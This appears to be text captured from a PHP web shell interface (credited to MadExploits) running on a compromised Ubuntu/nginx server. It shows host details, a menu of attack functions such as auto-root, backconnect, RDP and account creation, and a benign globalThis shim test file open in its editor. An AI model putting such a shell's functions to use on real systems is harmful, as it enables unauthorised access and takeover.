Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
globalthis /
test /
[ HOME SHELL ]
Name
Size
Permission
Action
implementation.js
213
B
-rw-rw-rw-
index.js
196
B
-rw-rw-rw-
native.js
767
B
-rw-rw-rw-
shimmed.js
900
B
-rw-rw-rw-
tests.js
1.37
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : shimmed.js
'use strict'; require('../auto'); var test = require('tape'); var defineProperties = require('define-properties'); var isEnumerable = Object.prototype.propertyIsEnumerable; var runTests = require('./tests'); test('shimmed', function (t) { t.equal(typeof globalThis, 'object', 'globalThis is an object'); t.equal('globalThis' in globalThis, true, 'globalThis is in globalThis'); t.test('enumerability', { skip: !defineProperties.supportsDescriptors }, function (et) { et.equal(false, isEnumerable.call(globalThis, 'globalThis'), 'globalThis.globalThis is not enumerable'); et.end(); }); t.test('writability', { skip: !defineProperties.supportsDescriptors }, function (wt) { var desc = Object.getOwnPropertyDescriptor(globalThis, 'globalThis'); wt.equal(desc.writable, true, 'globalThis.globalThis is writable'); wt.end(); }); runTests(globalThis.globalThis, t); t.end(); });
Close